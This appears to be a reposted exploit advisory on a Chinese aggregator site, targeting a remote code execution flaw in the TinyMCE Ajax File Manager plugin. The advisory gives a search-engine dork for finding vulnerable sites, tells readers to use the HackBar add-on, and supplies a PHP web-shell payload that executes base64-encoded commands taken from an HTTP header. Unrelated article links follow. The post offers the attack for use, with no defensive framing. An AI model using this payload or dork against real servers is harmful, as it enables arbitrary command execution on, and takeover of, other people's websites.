TinyMCE Ajax File Manager suffers from a remote code executi
发布时间:2020-12-15 20:57:07 所属栏目:百科 来源:网络整理
导读:____ ____ ____ _______/ |________ ____ ____ / _ / _/ __ / ___/ ___ __ _/ __ _/ __ ( _ ) | ___/ ___ | | | | / ___/ ___/ ____/|___| /___ ____ |_ | |__| ___ ___ / / / / / # Exploit Title : timynce Ajax File Manager
____ ____ ____ _______/ |________ ____ ____
/ _ / _/ __ / ___/ ___ __ _/ __ _/ __
( <_> ) | ___/ ___ | | | | / ___/ ___/
____/|___| /___ >____ > |_ | |__| ___ >___ >
/ / / / /
# Exploit Title : timynce Ajax File Manager Remote Code
# Author : By onestree
# Software Link : http://www.phpletter.com/Demo/Tinymce-Ajax-File-Manager/
# tested : windows 7
# Dork : inurl:"/plugins/filemanager/" or inurl:'/timynce/plugins/"
*************************************************************
how to run the exploit use firefox web browser
and download firefox add ons HackBar
exploit :
foo=<?php error_reporting(0);print(system('onestree'));passthru(base64_decode($_SERVER[HTTP_CMD]));die; ?>
====================================================================
tutorial video
https://www.youtube.com/watch?v=ahli-dehYWY
Thanks :
Exploit-db | Alex_Ownz | alm.teardrop | abhelink | kalong666 | prorebell
indonesiancoder - moeslimh4x0r - go-coder
spesial my hunny ( Fheby Yahya) :* muaaah (编辑:李大同) 【声明】本站内容均来自网络,其相关言论仅代表作者个人观点,不代表本站立场。若无意侵犯到您的权利,请及时与联系站长删除相关内容! |
相关内容
- 深入了解 Dojo 的核心接口
- ruby-on-rails – 捆绑安装和更新无法找到并安装jQuery-rai
- org.xml.sax.SAXParseException The content of element ty
- 在.NET Core控制台中使用依赖注入
- c# – 在linq中使用OrderBy()?
- flash urldecode函数
- c – 从libevent移植到boost :: asio:什么是ASIO中libeven
- 如何将一个按钮对齐在一个hbox中的flex?
- 使用Ajax时,服务器响应状态为500(内部服务器错误)
- 在输入输出字符串时scanf(),printf()和gets(),puts()的区别